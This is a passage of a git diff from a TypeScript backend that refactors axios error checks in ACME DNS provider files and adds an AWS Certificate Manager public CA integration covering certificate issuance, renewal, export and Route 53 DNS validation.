b/backend/src/services/certificate-authority/acme/dns-providers/azure-dns.ts index 6f8e80d154a..03fdcee5eda 100644 --- 
a/backend/src/services/certificate-authority/acme/dns-providers/azure-dns.ts +++ b/backend/src/services/certificate-authority/acme/dns-providers/azure-dns.ts @@ -1,4 +1,4 @@ -import axios from "axios"; +import { isAxiosError } from "axios"; import { request } from "@app/lib/config/request"; import { logger } from "@app/lib/logger"; @@ -41,7 +41,7 @@ export const azureDnsInsertTxtRecord = async ( } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access const errorMessage = (error.response?.data?.error?.message || error.message || "Unknown error") as string; throw new Error(typeof errorMessage === "string" ? errorMessage : String(errorMessage)); @@ -75,7 +75,7 @@ export const azureDnsDeleteTxtRecord = async ( } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { if (error.response?.status === 404) { logger.warn({ hostedZoneId, recordName, value }, "TXT record not found for deletion"); return; diff --git a/backend/src/services/certificate-authority/acme/dns-providers/cloudflare.ts b/backend/src/services/certificate-authority/acme/dns-providers/cloudflare.ts index 10de8c6c8a8..d9b6d088b51 100644 --- a/backend/src/services/certificate-authority/acme/dns-providers/cloudflare.ts +++ b/backend/src/services/certificate-authority/acme/dns-providers/cloudflare.ts @@ -1,5 +1,6 @@ /* eslint-disable no-await-in-loop */ -import axios from "axios"; + +import { isAxiosError } from "axios"; import { request } from "@app/lib/config/request"; import { TCloudflareConnectionConfig } from "@app/services/app-connection/cloudflare/cloudflare-connection-types"; @@ -34,7 +35,7 @@ export const cloudflareInsertTxtRecord = async ( } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { const firstErrorMessage = ( error.response?.data as { errors?: { message: string }[]; @@ -125,7 +126,7 @@ export const cloudflareDeleteTxtRecord = 
async ( } if (lastError) { - if (axios.isAxiosError(lastError)) { + if (isAxiosError(lastError)) { const firstErrorMessage = ( lastError.response?.data as { errors?: { message: string }[]; diff --git a/backend/src/services/certificate-authority/acme/dns-providers/dns-made-easy.ts b/backend/src/services/certificate-authority/acme/dns-providers/dns-made-easy.ts index cbfb26a2ec2..d54c67f2938 100644 --- a/backend/src/services/certificate-authority/acme/dns-providers/dns-made-easy.ts +++ b/backend/src/services/certificate-authority/acme/dns-providers/dns-made-easy.ts @@ -1,4 +1,4 @@ -import axios from "axios"; +import { isAxiosError } from "axios"; import { request } from "@app/lib/config/request"; import { logger } from "@app/lib/logger"; @@ -38,7 +38,7 @@ export const dnsMadeEasyInsertTxtRecord = async ( } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { const errorMessage = (error.response?.data as { error?: string[] | string })?.error?.[0] || (error.response?.data as { error?: string[] | string })?.error || @@ -93,7 +93,7 @@ export const dnsMadeEasyDeleteTxtRecord = async ( logger.warn({ hostedZoneId, domain, value }, "Record to delete not found"); } } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { const errorMessage = (error.response?.data as { error?: string[] | string })?.error?.[0] || (error.response?.data as { error?: string[] | string })?.error || diff --git a/backend/src/services/certificate-authority/acme/dns-providers/route54.ts b/backend/src/services/certificate-authority/acme/dns-providers/route54.ts deleted file mode 100644 index e2878ad4835..00000000000 --- a/backend/src/services/certificate-authority/acme/dns-providers/route54.ts +++ /dev/null @@ -1,75 +0,0 @@ -import { ChangeResourceRecordSetsCommand, Route53Client } from "@aws-sdk/client-route-53"; - -import { CustomAWSHasher } from "@app/lib/aws/hashing"; -import { crypto } from "@app/lib/crypto/cryptography"; -import { AWSRegion 
} from "@app/services/app-connection/app-connection-enums"; -import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; -import { TAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-types"; - -export const route53InsertTxtRecord = async ( - connection: TAwsConnectionConfig, - hostedZoneId: string, - domain: string, - value: string -) => { - const config = await getAwsConnectionConfig(connection, AWSRegion.US_WEST_1); // REGION is irrelevant because Route53 is global - const route53Client = new Route53Client({ - sha256: CustomAWSHasher, - useFipsEndpoint: crypto.isFipsModeEnabled(), - credentials: config.credentials, - region: config.region - }); - - const command = new ChangeResourceRecordSetsCommand({ - HostedZoneId: hostedZoneId, - ChangeBatch: { - Comment: "Set ACME challenge TXT record", - Changes: [ - { - Action: "UPSERT", - ResourceRecordSet: { - Name: domain, - Type: "TXT", - TTL: 30, - ResourceRecords: [{ Value: value }] - } - } - ] - } - }); - - await route53Client.send(command); -}; - -export const route53DeleteTxtRecord = async ( - connection: TAwsConnectionConfig, - hostedZoneId: string, - domain: string, - value: string -) => { - const config = await getAwsConnectionConfig(connection, AWSRegion.US_WEST_1); // REGION is irrelevant because Route53 is global - const route53Client = new Route53Client({ - credentials: config.credentials, - region: config.region - }); - - const command = new ChangeResourceRecordSetsCommand({ - HostedZoneId: hostedZoneId, - ChangeBatch: { - Comment: "Delete ACME challenge TXT record", - Changes: [ - { - Action: "DELETE", - ResourceRecordSet: { - Name: domain, - Type: "TXT", - TTL: 30, - ResourceRecords: [{ Value: value }] - } - } - ] - } - }); - - await route53Client.send(command); -}; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-client.ts 
b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-client.ts new file mode 100644 index 00000000000..c4c624cfb47 --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-client.ts @@ -0,0 +1,60 @@ +import { ACMClient } from "@aws-sdk/client-acm"; + +import { CustomAWSHasher } from "@app/lib/aws/hashing"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { NotFoundError } from "@app/lib/errors"; +import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AWSRegion } from "@app/services/app-connection/app-connection-enums"; +import { decryptAppConnection } from "@app/services/app-connection/app-connection-fns"; +import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; +import { TAwsConnection } from "@app/services/app-connection/aws/aws-connection-types"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; + +export const createAcmClient = async ({ + appConnectionId, + region, + appConnectionDAL, + kmsService +}: { + appConnectionId: string; + region: AWSRegion; + appConnectionDAL: Pick; + kmsService: Pick< + TKmsServiceFactory, + "encryptWithKmsKey" | "generateKmsKey" | "createCipherPairWithDataKey" | "decryptWithKmsKey" + >; +}) => { + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `App connection with ID '${appConnectionId}' not found` }); + } + + const decryptedConnection = (await decryptAppConnection(appConnection, kmsService)) as TAwsConnection; + const awsConfig = await getAwsConnectionConfig(decryptedConnection, region); + + return new ACMClient({ + sha256: CustomAWSHasher, + useFipsEndpoint: crypto.isFipsModeEnabled(), + credentials: awsConfig.credentials, + region: awsConfig.region + }); +}; + +export const resolveDnsAwsConnection = async ({ + 
dnsAppConnectionId, + appConnectionDAL, + kmsService +}: { + dnsAppConnectionId: string; + appConnectionDAL: Pick; + kmsService: Pick< + TKmsServiceFactory, + "encryptWithKmsKey" | "generateKmsKey" | "createCipherPairWithDataKey" | "decryptWithKmsKey" + >; +}) => { + const dnsAppConnection = await appConnectionDAL.findById(dnsAppConnectionId); + if (!dnsAppConnection) { + throw new NotFoundError({ message: `DNS app connection with ID '${dnsAppConnectionId}' not found` }); + } + return (await decryptAppConnection(dnsAppConnection, kmsService)) as TAwsConnection; +}; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-enums.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-enums.ts new file mode 100644 index 00000000000..c2a669d21e7 --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-enums.ts @@ -0,0 +1,9 @@ +export enum AwsAcmValidationMethod { + DNS = "DNS" +} + +/** + * ACM public certificates have a fixed validity period (as of 2025). 
+ * See: https://docs.aws.amazon.com/acm/latest/userguide/managed-renewal.html + */ +export const AWS_ACM_CERTIFICATE_VALIDITY_DAYS = 198; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-errors.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-errors.ts new file mode 100644 index 00000000000..66bdf47f292 --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-errors.ts @@ -0,0 +1,15 @@ +/* eslint-disable max-classes-per-file */ + +export class AcmPendingError extends Error { + constructor(message: string) { + super(message); + this.name = "AcmPendingError"; + } +} + +export class AcmTerminalError extends Error { + constructor(message: string) { + super(message); + this.name = "AcmTerminalError"; + } +} diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns.ts new file mode 100644 index 00000000000..d4a44c45300 --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns.ts @@ -0,0 +1,865 @@ +/* eslint-disable no-await-in-loop */ +import { + ACMClient, + CertificateExport, + CertificateStatus, + DescribeCertificateCommand, + ExportCertificateCommand, + ListCertificatesCommand, + RenewCertificateCommand, + RequestCertificateCommand, + RevocationReason, + RevokeCertificateCommand, + ValidationMethod +} from "@aws-sdk/client-acm"; +import * as x509 from "@peculiar/x509"; +import RE2 from "re2"; + +import { TableName } from "@app/db/schemas"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { ProcessedPermissionRules } from "@app/lib/knex/permission-filter-utils"; +import { 
logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; +import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AppConnection, AWSRegion } from "@app/services/app-connection/app-connection-enums"; +import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; +import { TCertificateBodyDALFactory } from "@app/services/certificate/certificate-body-dal"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; +import { extractCertificateFields } from "@app/services/certificate/certificate-fns"; +import { TCertificateSecretDALFactory } from "@app/services/certificate/certificate-secret-dal"; +import { + CertExtendedKeyUsage, + CertExtendedKeyUsageOIDToName, + CertKeyAlgorithm, + CertKeyUsage, + CertSignatureAlgorithm, + CertStatus, + CertSubjectAlternativeNameType, + CrlReason +} from "@app/services/certificate/certificate-types"; +import { ExternalMetadataSchema } from "@app/services/certificate-common/external-metadata-schemas"; +import { TCertificateProfileDALFactory } from "@app/services/certificate-profile/certificate-profile-dal"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { TProjectDALFactory } from "@app/services/project/project-dal"; +import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns"; + +import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; +import { CaStatus, CaType } from "../certificate-authority-enums"; +import { route53GetHostedZone, route53UpsertRecord } from "../dns-providers/route53"; +import { TExternalCertificateAuthorityDALFactory } from "../external-certificate-authority-dal"; +import { createAcmClient, resolveDnsAwsConnection } from "./aws-acm-public-ca-certificate-authority-client"; +import { AwsAcmValidationMethod } from "./aws-acm-public-ca-certificate-authority-enums"; +import { AcmPendingError, AcmTerminalError } 
from "./aws-acm-public-ca-certificate-authority-errors"; +import { + TAwsAcmPublicCaCertificateAuthority, + TCreateAwsAcmPublicCaCertificateAuthorityDTO, + TUpdateAwsAcmPublicCaCertificateAuthorityDTO +} from "./aws-acm-public-ca-certificate-authority-types"; +import { + buildIdempotencyToken, + generateAcmPassphrase, + mapCertKeyAlgorithmToAcm, + validateAcmIssuanceInputs +} from "./aws-acm-public-ca-certificate-authority-validators"; + +const CRL_REASON_TO_ACM_REVOCATION_REASON_MAP: Record = { + [CrlReason.UNSPECIFIED]: RevocationReason.UNSPECIFIED, + [CrlReason.KEY_COMPROMISE]: RevocationReason.KEY_COMPROMISE, + [CrlReason.CA_COMPROMISE]: RevocationReason.CA_COMPROMISE, + [CrlReason.AFFILIATION_CHANGED]: RevocationReason.AFFILIATION_CHANGED, + [CrlReason.SUPERSEDED]: RevocationReason.SUPERSEDED, + [CrlReason.CESSATION_OF_OPERATION]: RevocationReason.CESSATION_OF_OPERATION, + [CrlReason.CERTIFICATE_HOLD]: RevocationReason.CERTIFICATE_HOLD, + [CrlReason.PRIVILEGE_WITHDRAWN]: RevocationReason.PRIVILEGE_WITHDRAWN, + [CrlReason.A_A_COMPROMISE]: RevocationReason.A_A_COMPROMISE +}; + +type TAwsAcmPublicCaCertificateAuthorityFnsDeps = { + appConnectionDAL: Pick; + appConnectionService: Pick; + certificateAuthorityDAL: Pick< + TCertificateAuthorityDALFactory, + "create" | "transaction" | "findByIdWithAssociatedCa" | "updateById" | "findWithAssociatedCa" | "findById" + >; + externalCertificateAuthorityDAL: Pick; + certificateDAL: Pick; + certificateBodyDAL: Pick; + certificateSecretDAL: Pick; + kmsService: Pick< + TKmsServiceFactory, + "encryptWithKmsKey" | "generateKmsKey" | "createCipherPairWithDataKey" | "decryptWithKmsKey" + >; + projectDAL: Pick; + certificateProfileDAL?: Pick; +}; + +export const castDbEntryToAwsAcmPublicCaCertificateAuthority = ( + ca: Awaited> +): TAwsAcmPublicCaCertificateAuthority => { + if (!ca.externalCa?.id) { + throw new BadRequestError({ message: "Malformed AWS ACM Public Certificate Authority" }); + } + + if 
(!ca.externalCa.appConnectionId) { + throw new BadRequestError({ + message: "AWS app connection ID is missing from certificate authority configuration" + }); + } + + const configuration = ca.externalCa.configuration as { + dnsAppConnectionId?: string; + hostedZoneId?: string; + region: AWSRegion; + }; + + if (!configuration.region || !configuration.dnsAppConnectionId || !configuration.hostedZoneId) { + throw new BadRequestError({ + message: "AWS ACM configuration is incomplete β€” region, Route 53 connection, and hosted zone ID are required" + }); + } + + return { + id: ca.id, + type: CaType.AWS_ACM_PUBLIC_CA, + enableDirectIssuance: ca.enableDirectIssuance, + name: ca.name, + projectId: ca.projectId, + configuration: { + appConnectionId: ca.externalCa.appConnectionId, + dnsAppConnectionId: configuration.dnsAppConnectionId, + hostedZoneId: configuration.hostedZoneId, + region: configuration.region + }, + status: ca.status as CaStatus + }; +}; + +export const AwsAcmPublicCaCertificateAuthorityFns = ({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL +}: TAwsAcmPublicCaCertificateAuthorityFnsDeps) => { + const validateAwsConnection = async ({ + appConnectionId, + dnsAppConnectionId, + projectId, + actor + }: { + appConnectionId: string; + dnsAppConnectionId?: string; + projectId: string; + actor: OrgServiceActor; + }) => { + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `App connection with ID '${appConnectionId}' not found` }); + } + if (appConnection.app !== AppConnection.AWS) { + throw new BadRequestError({ + message: `App connection with ID '${appConnectionId}' is not an AWS connection` + }); + } + await appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { 
connectionId: appConnectionId, projectId }, + actor + ); + + if (dnsAppConnectionId && dnsAppConnectionId !== appConnectionId) { + const dnsAppConnection = await appConnectionDAL.findById(dnsAppConnectionId); + if (!dnsAppConnection) { + throw new NotFoundError({ message: `DNS app connection with ID '${dnsAppConnectionId}' not found` }); + } + if (dnsAppConnection.app !== AppConnection.AWS) { + throw new BadRequestError({ + message: `DNS app connection with ID '${dnsAppConnectionId}' is not an AWS connection` + }); + } + await appConnectionService.validateAppConnectionUsageById( + dnsAppConnection.app as AppConnection, + { connectionId: dnsAppConnectionId, projectId }, + actor + ); + } + }; + + const createCertificateAuthority = async ({ + name, + projectId, + configuration, + actor, + status + }: { + status: CaStatus; + name: string; + projectId: string; + configuration: TCreateAwsAcmPublicCaCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + }) => { + const { appConnectionId, dnsAppConnectionId, hostedZoneId, region } = configuration; + + await validateAwsConnection({ appConnectionId, dnsAppConnectionId, projectId, actor }); + + // Smoke-test both connections up front β€” ACM via ListCertificates (no single "get CA" resource), + // and Route 53 via GetHostedZone so a misconfigured DNS connection / wrong zone ID fails + // synchronously here instead of mid-issuance. + const acmClient = await createAcmClient({ appConnectionId, region, appConnectionDAL, kmsService }); + try { + await acmClient.send(new ListCertificatesCommand({ MaxItems: 1 })); + } catch (error) { + throw new BadRequestError({ + message: `Failed to reach AWS Certificate Manager: ${error instanceof Error ? 
error.message : "Unknown error"}` + }); + } + + const dnsConnection = await resolveDnsAwsConnection({ dnsAppConnectionId, appConnectionDAL, kmsService }); + try { + await route53GetHostedZone(dnsConnection, hostedZoneId); + } catch (error) { + throw new BadRequestError({ + message: `Failed to access Route 53 hosted zone: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + + const caEntity = await certificateAuthorityDAL.transaction(async (tx) => { + try { + const ca = await certificateAuthorityDAL.create( + { + projectId, + enableDirectIssuance: false, + name, + status + }, + tx + ); + + await externalCertificateAuthorityDAL.create( + { + caId: ca.id, + appConnectionId, + type: CaType.AWS_ACM_PUBLIC_CA, + configuration: { + dnsAppConnectionId, + hostedZoneId, + region + } + }, + tx + ); + + return await certificateAuthorityDAL.findByIdWithAssociatedCa(ca.id, tx); + } catch (error) { + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access, @typescript-eslint/no-explicit-any + if ((error as any)?.error?.code === "23505") { + throw new BadRequestError({ + message: "Certificate authority with the same name already exists in your project" + }); + } + throw error; + } + }); + + if (!caEntity.externalCa?.id) { + throw new BadRequestError({ message: "Failed to create external certificate authority" }); + } + + return castDbEntryToAwsAcmPublicCaCertificateAuthority(caEntity); + }; + + const updateCertificateAuthority = async ({ + id, + status, + configuration, + actor, + name + }: { + id: string; + status?: CaStatus; + configuration: TUpdateAwsAcmPublicCaCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + name?: string; + }) => { + if (configuration) { + const { appConnectionId, dnsAppConnectionId, hostedZoneId, region } = configuration; + + const ca = await certificateAuthorityDAL.findById(id); + if (!ca) { + throw new NotFoundError({ message: `Could not find Certificate Authority with ID "${id}"` }); + } + + await 
validateAwsConnection({ appConnectionId, dnsAppConnectionId, projectId: ca.projectId, actor }); + + const acmClient = await createAcmClient({ appConnectionId, region, appConnectionDAL, kmsService }); + try { + await acmClient.send(new ListCertificatesCommand({ MaxItems: 1 })); + } catch (error) { + throw new BadRequestError({ + message: `Failed to reach AWS Certificate Manager: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + + const dnsConnection = await resolveDnsAwsConnection({ dnsAppConnectionId, appConnectionDAL, kmsService }); + try { + await route53GetHostedZone(dnsConnection, hostedZoneId); + } catch (error) { + throw new BadRequestError({ + message: `Failed to access Route 53 hosted zone: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + } + + const updatedCa = await certificateAuthorityDAL.transaction(async (tx) => { + if (configuration) { + await externalCertificateAuthorityDAL.update( + { + caId: id, + type: CaType.AWS_ACM_PUBLIC_CA + }, + { + appConnectionId: configuration.appConnectionId, + configuration: { + dnsAppConnectionId: configuration.dnsAppConnectionId, + hostedZoneId: configuration.hostedZoneId, + region: configuration.region + } + }, + tx + ); + } + + if (name || status) { + await certificateAuthorityDAL.updateById( + id, + { + name, + status + }, + tx + ); + } + + return certificateAuthorityDAL.findByIdWithAssociatedCa(id, tx); + }); + + if (!updatedCa.externalCa?.id) { + throw new BadRequestError({ message: "Failed to update external certificate authority" }); + } + + return castDbEntryToAwsAcmPublicCaCertificateAuthority(updatedCa); + }; + + const listCertificateAuthorities = async ({ + projectId, + permissionFilters + }: { + projectId: string; + permissionFilters?: ProcessedPermissionRules; + }) => { + const cas = await certificateAuthorityDAL.findWithAssociatedCa( + { + [`${TableName.CertificateAuthority}.projectId` as "projectId"]: projectId, + 
[`${TableName.ExternalCertificateAuthority}.type` as "type"]: CaType.AWS_ACM_PUBLIC_CA + }, + {}, + permissionFilters + ); + + return cas.map(castDbEntryToAwsAcmPublicCaCertificateAuthority); + }; + + /** + * Issues (or renews) a certificate from AWS Certificate Manager. + * + * Idempotent via AWS's IdempotencyToken: retrying the same certificateId within + * AWS's 1-hour window returns the same certificate ARN, so we don't need to persist + * intermediate state across retries. The cert record is only created when everything + * completes, in a single DB transaction. If DNS validation is still pending, this + * function throws AcmPendingError and the queue retries. + */ + const orderCertificateFromProfile = async ({ + caId, + profileId, + commonName, + altNames = [], + keyAlgorithm = CertKeyAlgorithm.RSA_2048, + isRenewal, + originalCertificateId, + certificateId, + csr, + validity, + organization, + organizationalUnit, + country, + state, + locality, + keyUsages = [], + extendedKeyUsages = [] + }: { + caId: string; + profileId: string; + commonName: string; + altNames?: Array<{ type: CertSubjectAlternativeNameType; value: string }>; + keyAlgorithm?: CertKeyAlgorithm; + isRenewal?: boolean; + originalCertificateId?: string; + certificateId: string; + csr?: string; + validity?: { ttl?: string }; + organization?: string; + organizationalUnit?: string; + country?: string; + state?: string; + locality?: string; + keyUsages?: string[]; + extendedKeyUsages?: string[]; + }) => { + validateAcmIssuanceInputs({ + csr, + keyAlgorithm, + altNames, + ttl: validity?.ttl, + organization, + organizationalUnit, + country, + state, + locality, + isRenewal + }); + + if (keyUsages.length > 0 || extendedKeyUsages.length > 0) { + logger.info( + `[caId=${caId}] AWS ACM overrides caller-specified key usages and extended key usages with its own current policy.` + ); + } + + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type 
!== CaType.AWS_ACM_PUBLIC_CA) { + throw new BadRequestError({ message: "CA is not an AWS ACM Public Certificate Authority" }); + } + + const acmCa = castDbEntryToAwsAcmPublicCaCertificateAuthority(ca); + if (acmCa.status !== CaStatus.ACTIVE) { + throw new BadRequestError({ message: "CA is disabled" }); + } + + const { appConnectionId, dnsAppConnectionId, hostedZoneId, region } = acmCa.configuration; + + // ACM ARNs are region-locked. On renewal this gets overwritten with the original + // cert's region so the stored metadata stays consistent with the ARN even if the + // CA's configured region was edited between issuance and renewal. + let issuanceRegion: AWSRegion = region; + + const certificateManagerKmsId = await getProjectKmsCertificateKeyId({ + projectId: ca.projectId, + projectDAL, + kmsService + }); + + const kmsEncryptor = await kmsService.encryptWithKmsKey({ kmsId: certificateManagerKmsId }); + let certificateArn: string; + let acmClient: ACMClient; + + if (isRenewal && originalCertificateId) { + const originalCert = await certificateDAL.findById(originalCertificateId); + if (!originalCert) { + throw new BadRequestError({ message: `Original certificate ${originalCertificateId} not found` }); + } + const parsedMetadata = ExternalMetadataSchema.safeParse(originalCert.externalMetadata); + if ( + !parsedMetadata.success || + parsedMetadata.data.type !== CaType.AWS_ACM_PUBLIC_CA || + !parsedMetadata.data.arn + ) { + throw new BadRequestError({ + message: "Original certificate is missing AWS ACM metadata β€” cannot renew" + }); + } + certificateArn = parsedMetadata.data.arn; + issuanceRegion = parsedMetadata.data.region; + + acmClient = await createAcmClient({ + appConnectionId, + region: issuanceRegion, + appConnectionDAL, + kmsService + }); + + const describe = await acmClient.send(new DescribeCertificateCommand({ CertificateArn: certificateArn })); + const detail = describe.Certificate; + if (!detail) { + throw new BadRequestError({ message: `ACM did not 
return details for certificate ${certificateArn}` }); + } + // ACM serials may come back colon-separated hex (e.g., "0a:1b:..."), our DB stores plain hex β€” + // normalize both before comparing. + const normalizeSerial = (s?: string | null) => s?.split(":").join("").toLowerCase() ?? ""; + const storedSerial = normalizeSerial(originalCert.serialNumber); + const awsSerial = normalizeSerial(detail.Serial); + const alreadyRenewedByAws = Boolean(awsSerial && storedSerial && awsSerial !== storedSerial); + + if (!alreadyRenewedByAws) { + if (detail.DomainValidationOptions) { + const dnsConnection = await resolveDnsAwsConnection({ + dnsAppConnectionId, + appConnectionDAL, + kmsService + }); + for (const dv of detail.DomainValidationOptions) { + if (dv.ResourceRecord?.Name && dv.ResourceRecord?.Value) { + await route53UpsertRecord(dnsConnection, hostedZoneId, { + name: dv.ResourceRecord.Name, + type: "CNAME", + value: dv.ResourceRecord.Value + }); + } + } + } + + const renewalInProgress = detail.RenewalSummary?.RenewalStatus === "PENDING_VALIDATION"; + if (!renewalInProgress) { + await acmClient.send(new RenewCertificateCommand({ CertificateArn: certificateArn })); + } + + const afterRenew = await acmClient.send(new DescribeCertificateCommand({ CertificateArn: certificateArn })); + const renewStatus = afterRenew.Certificate?.RenewalSummary?.RenewalStatus; + if (renewStatus === "FAILED") { + throw new AcmTerminalError(`AWS ACM renewal failed for ${certificateArn}`); + } + // ExportCertificate keeps returning the original cert until ACM has fully re-issued the + // renewed one. Serial number changing is the ground-truth signal that a new cert body + // exists; NotAfter and RenewalStatus can lag or be misleading. 
+ const newSerial = normalizeSerial(afterRenew.Certificate?.Serial); + const renewalComplete = Boolean(newSerial && storedSerial && newSerial !== storedSerial); + if (!renewalComplete) { + throw new AcmPendingError( + `AWS ACM renewal for ${certificateArn} has not completed yet (status=${renewStatus ?? "unknown"}) β€” will retry` + ); + } + } + } else { + // New issuance β€” use the CA's configured region. + acmClient = await createAcmClient({ appConnectionId, region, appConnectionDAL, kmsService }); + + const domainName = commonName || (altNames.length > 0 ? altNames[0].value : ""); + if (!domainName) { + throw new BadRequestError({ message: "AWS ACM requires a DomainName (common name or first SAN)" }); + } + const subjectAlternativeNames = altNames.map((s) => s.value); + + const idempotencyToken = buildIdempotencyToken(certificateId); + + const requestResult = await acmClient.send( + new RequestCertificateCommand({ + DomainName: domainName, + SubjectAlternativeNames: subjectAlternativeNames.length > 0 ? 
subjectAlternativeNames : undefined, + KeyAlgorithm: mapCertKeyAlgorithmToAcm(keyAlgorithm), + ValidationMethod: ValidationMethod.DNS, + IdempotencyToken: idempotencyToken, + Options: { Export: CertificateExport.ENABLED } + }) + ); + + if (!requestResult.CertificateArn) { + throw new BadRequestError({ message: "AWS ACM did not return a certificate ARN" }); + } + certificateArn = requestResult.CertificateArn; + + const describe = await acmClient.send(new DescribeCertificateCommand({ CertificateArn: certificateArn })); + const detail = describe.Certificate; + if (!detail) { + throw new BadRequestError({ message: `ACM did not return details for certificate ${certificateArn}` }); + } + + if (detail.DomainValidationOptions) { + const dnsConnection = await resolveDnsAwsConnection({ + dnsAppConnectionId, + appConnectionDAL, + kmsService + }); + for (const dv of detail.DomainValidationOptions) { + if (dv.ResourceRecord?.Name && dv.ResourceRecord?.Value) { + await route53UpsertRecord(dnsConnection, hostedZoneId, { + name: dv.ResourceRecord.Name, + type: "CNAME", + value: dv.ResourceRecord.Value + }); + } + } + } + + if (detail.Status === CertificateStatus.PENDING_VALIDATION) { + throw new AcmPendingError(`AWS ACM certificate ${certificateArn} is still pending DNS validation β€” will retry`); + } + if ( + detail.Status === CertificateStatus.FAILED || + detail.Status === CertificateStatus.VALIDATION_TIMED_OUT || + detail.Status === CertificateStatus.REVOKED || + detail.Status === CertificateStatus.EXPIRED + ) { + throw new AcmTerminalError(`AWS ACM certificate ${certificateArn} is in terminal status: ${detail.Status}`); + } + } + + const passphrase = generateAcmPassphrase(); + let exportResult; + try { + exportResult = await acmClient.send( + new ExportCertificateCommand({ + CertificateArn: certificateArn, + Passphrase: Buffer.from(passphrase, "utf8") + }) + ); + } catch (error) { + // Right after RenewCertificate succeeds, ACM sometimes hasn't fully established the export + 
// relation for the renewed cert body yet and returns "must have at least one relation of type + // EXPORT". This is transient β€” let the queue retry loop handle it. + if (error instanceof Error && new RE2("relation of type EXPORT", "i").test(error.message)) { + throw new AcmPendingError( + `AWS ACM export not yet available for ${certificateArn} (${error.message}) β€” will retry` + ); + } + throw error; + } + + if (!exportResult.Certificate || !exportResult.PrivateKey) { + throw new BadRequestError({ + message: `AWS ACM ExportCertificate did not return certificate body or private key for ${certificateArn}` + }); + } + + const certificatePem = exportResult.Certificate; + const certificateChainPem = exportResult.CertificateChain || ""; + const encryptedPrivateKeyPem = exportResult.PrivateKey; + + // Decrypt AWS's encrypted private key with the ephemeral passphrase, then re-serialize as plain PKCS8. + const privateKeyObj = crypto.nativeCrypto.createPrivateKey({ + key: encryptedPrivateKeyPem, + format: "pem", + passphrase + }); + const privateKeyPem = privateKeyObj.export({ format: "pem", type: "pkcs8" }) as string; + + let certObj: x509.X509Certificate; + try { + certObj = new x509.X509Certificate(certificatePem); + } catch (error) { + throw new BadRequestError({ + message: `Failed to parse certificate from AWS ACM: ${error instanceof Error ? 
error.message : "Unknown error"}` + }); + } + + const { cipherTextBlob: encryptedCertificate } = await kmsEncryptor({ + plainText: Buffer.from(new Uint8Array(certObj.rawData)) + }); + + const { cipherTextBlob: encryptedCertificateChain } = await kmsEncryptor({ + plainText: Buffer.from(certificateChainPem) + }); + + const { cipherTextBlob: encryptedPrivateKey } = await kmsEncryptor({ + plainText: Buffer.from(privateKeyPem) + }); + + const parsedFields = extractCertificateFields(Buffer.from(certificatePem)); + + // Extract key usages and extended key usages from the certificate ACM actually issued β€” + // ACM applies its own policy and revises it over time, so the request is not the source of truth. + let issuedKeyUsages: CertKeyUsage[] = []; + const keyUsagesExt = certObj.getExtension(x509.KeyUsagesExtension); + if (keyUsagesExt) { + issuedKeyUsages = Object.values(CertKeyUsage).filter( + // eslint-disable-next-line no-bitwise + (usage) => (x509.KeyUsageFlags[usage] & keyUsagesExt.usages) !== 0 + ); + } + + let issuedExtendedKeyUsages: CertExtendedKeyUsage[] = []; + const extKeyUsageExt = certObj.getExtension(x509.ExtendedKeyUsageExtension); + if (extKeyUsageExt) { + issuedExtendedKeyUsages = 